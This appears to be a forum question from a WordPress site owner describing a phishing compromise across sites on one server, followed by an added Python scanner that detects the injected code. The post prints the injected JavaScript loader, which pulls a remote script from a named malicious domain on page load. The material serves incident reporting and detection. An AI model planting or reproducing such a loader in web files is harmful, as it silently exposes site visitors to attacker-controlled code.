WP Phishing Malware: iglesiaelarca. Anyone experienced? [closed]
We got hacked by iglesiaelarca.com (don't open it, it's a malicious URL).
Our setup: DigitalOcean VPS, Apache, multiple domains & WP websites, Elementor Pro, hopefully safe plugins.
Known facts:
- It's phishing.
- The virus infects all the websites on our VPS.
- They like to play hide'n'seek. It randomly injects client files (mostly minified plugin files) with random code. (On one site it's jquery-migrate.min.js, on another site it's elementor-pro... just random)
This is the code injected right at the start of a compromised file:
```javascript
;(function(b, r, f, c, m, j) {
    m = r.createElement(f);
    j = r.getElementsByTagName(f)[0];
    m.async = 1;
    m.src = c;
    j.parentNode.insertBefore(m, j);
})(window, document, 'script', 'https://trademark.iglesiaelarca.com/OM34nkPvm/dc78KsD/rUvErvwrxWv5LuVK+ZvEU=');
```
Anyone experienced this kind of exploitation?
Will inform you about more findings.
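An added example, not part of the original post: a Python scanner that walks a web root and reports every `.js` file that begins with a loader of the shape quoted above, along with the remote host it pulls from. It matches on the structure rather than the domain, so it goes slightly beyond the one URL in the post; the function names, the 4096-byte head size and the `example.invalid` sample are assumptions made for the example.

```python
import re
import sys
from pathlib import Path
from urllib.parse import urlsplit

HEAD_BYTES = 4096  # the post says the loader sits right at the start of the file

# Shape of the loader quoted in the post, whitespace-tolerant so a minified
# copy also matches: an IIFE that creates an element, inserts it before the
# first one, and is called with (window, document, 'script', '<remote URL>').
LOADER_RE = re.compile(
    rb"\A\s*;?\s*\(\s*function\s*\([^)]*\)\s*\{"
    rb"[^}]*?\.createElement\([^}]*?\.insertBefore\([^}]*?\}\s*\)\s*"
    rb"\(\s*window\s*,\s*document\s*,\s*(['\"])script\1\s*,"
    rb"\s*(['\"])(https?://[^'\"]+)\2\s*\)",
    re.DOTALL,
)

def loader_host(head: bytes):
    """Return the remote host the prepended loader pulls from, or None."""
    m = LOADER_RE.match(head)
    if not m:
        return None
    return urlsplit(m.group(3).decode("ascii", "replace")).hostname

def scan(root):
    """Return (path, host) for every .js file under root that starts with the loader."""
    hits = []
    for path in sorted(Path(root).rglob("*.js")):
        try:
            with open(path, "rb") as fh:
                host = loader_host(fh.read(HEAD_BYTES))
        except OSError:
            continue  # unreadable file, directory or broken symlink: keep scanning
        if host:
            hits.append((str(path), host))
    return hits

# Constructed sample (placeholder host), minified the way plugin files are.
SAMPLE = (b";(function(b,r,f,c,m,j){m=r.createElement(f);"
          b"j=r.getElementsByTagName(f)[0];m.async=1;m.src=c;"
          b"j.parentNode.insertBefore(m,j);})(window,document,'script',"
          b"'https://cdn.example.invalid/a/b');/*! original plugin code */")

if __name__ == "__main__":
    for path, host in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}\t{host}")
```

Run it against the directory that holds all the sites on the server. A clean result only means no file starts with this loader shape; it says nothing about how the files were modified in the first place.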